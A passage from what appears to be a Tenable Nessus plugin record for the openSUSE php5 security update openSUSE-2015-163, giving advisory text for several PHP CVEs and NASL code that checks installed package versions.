sapi/cgi/cgi_main.c in the CGI component\n in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x\n through 5.6.4, when mmap was used to read a .php file,\n did not properly consider the mapping's length during\n processing of an invalid file that begins with a #\n character and lacks a newline character, which caused an\n out-of-bounds read and might (1) allowed remote\n attackers to obtain sensitive information from php-cgi\n process memory by leveraging the ability to upload 
a\n .php file or (2) trigger unexpected code execution if a\n valid PHP script is present in memory locations adjacent\n to the mapping (bnc#911664).\n\nFor openSUSE 13.2 this additional security issue was fixed :\n\n - CVE-2014-9426: The apprentice_load function in\n libmagic/apprentice.c in the Fileinfo component in PHP\n through 5.6.4 attempted to perform a free operation on a\n stack-based character array, which allowed remote\n attackers to cause a denial of service (memory\n corruption or application crash) or possibly have\n unspecified other impact via unknown vectors\n (bnc#911663).", "modified": "2015-10-05T00:00:00", "published": "2015-02-20T00:00:00", "id": "OPENSUSE-2015-163.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81418", "title": "openSUSE Security Update : php5 (openSUSE-2015-163)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-163.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81418);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2015/10/05 13:44:22 $\");\n\n script_cve_id(\"CVE-2004-1019\", \"CVE-2014-8142\", \"CVE-2014-9426\", \"CVE-2014-9427\", \"CVE-2015-0231\", \"CVE-2015-0232\");\n\n script_name(english:\"openSUSE Security Update : php5 (openSUSE-2015-163)\");\n script_summary(english:\"Check for the openSUSE-2015-163 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php5 was updated to fix five security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-0231: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.37,\n 5.5.x before 5.5.21, 
and 5.6.x before 5.6.5 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate numerical keys within the serialized\n properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142\n (bnc#910659).\n\n - CVE-2015-0232: The exif_process_unicode function in\n ext/exif/exif.c in PHP before 5.4.37, 5.5.x before\n 5.5.21, and 5.6.x before 5.6.5 allowed remote attackers\n to execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bnc#914690).\n\n - CVE-2014-8142: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.36,\n 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate keys within the serialized properties of an\n object, a different vulnerability than CVE-2004-1019\n (bnc#910659).\n\n - CVE-2014-9427: sapi/cgi/cgi_main.c in the CGI component\n in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x\n through 5.6.4, when mmap was used to read a .php file,\n did not properly consider the mapping's length during\n processing of an invalid file that begins with a #\n character and lacks a newline character, which caused an\n out-of-bounds read and might (1) allowed remote\n attackers to obtain sensitive information from php-cgi\n process memory by leveraging the ability to upload a\n .php file or (2) trigger unexpected code execution if a\n valid PHP script is present in memory locations adjacent\n to the mapping (bnc#911664).\n\nFor openSUSE 13.2 this additional security issue was fixed :\n\n - CVE-2014-9426: The apprentice_load function in\n libmagic/apprentice.c in the Fileinfo component in PHP\n through 5.6.4 attempted to perform a free operation on a\n stack-based 
character array, which allowed remote\n attackers to cause a denial of service (memory\n corruption or application crash) or possibly have\n unspecified other impact via unknown vectors\n (bnc#911663).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=907519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=910659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=911663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=911664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=914690\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_php5-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_php5-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bcmath-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 
reference:\"php5-bcmath-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bz2-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bz2-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-calendar-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-calendar-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ctype-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ctype-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-curl-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-curl-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dba-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dba-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-debugsource-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-devel-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dom-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dom-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-enchant-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-enchant-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-exif-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-exif-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fastcgi-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fastcgi-debuginfo-5.4.20-38.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"php5-fileinfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fileinfo-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-firebird-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-firebird-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fpm-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fpm-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ftp-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ftp-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gd-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gd-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gettext-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gettext-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gmp-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gmp-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-iconv-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-iconv-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-imap-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-imap-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-intl-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-intl-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-json-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-json-debuginfo-5.4.20-38.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"php5-ldap-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ldap-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mbstring-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mbstring-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mcrypt-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mcrypt-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mssql-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mssql-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mysql-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mysql-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-odbc-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-odbc-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-openssl-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-openssl-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pcntl-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pcntl-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pdo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pdo-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pear-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pgsql-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pgsql-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-phar-5.4.20-38.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"php5-phar-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-posix-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-posix-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pspell-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pspell-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-readline-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-readline-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-shmop-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-shmop-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-snmp-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-snmp-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-soap-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-soap-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sockets-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sockets-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sqlite-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sqlite-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-suhosin-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-suhosin-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvmsg-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvmsg-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 
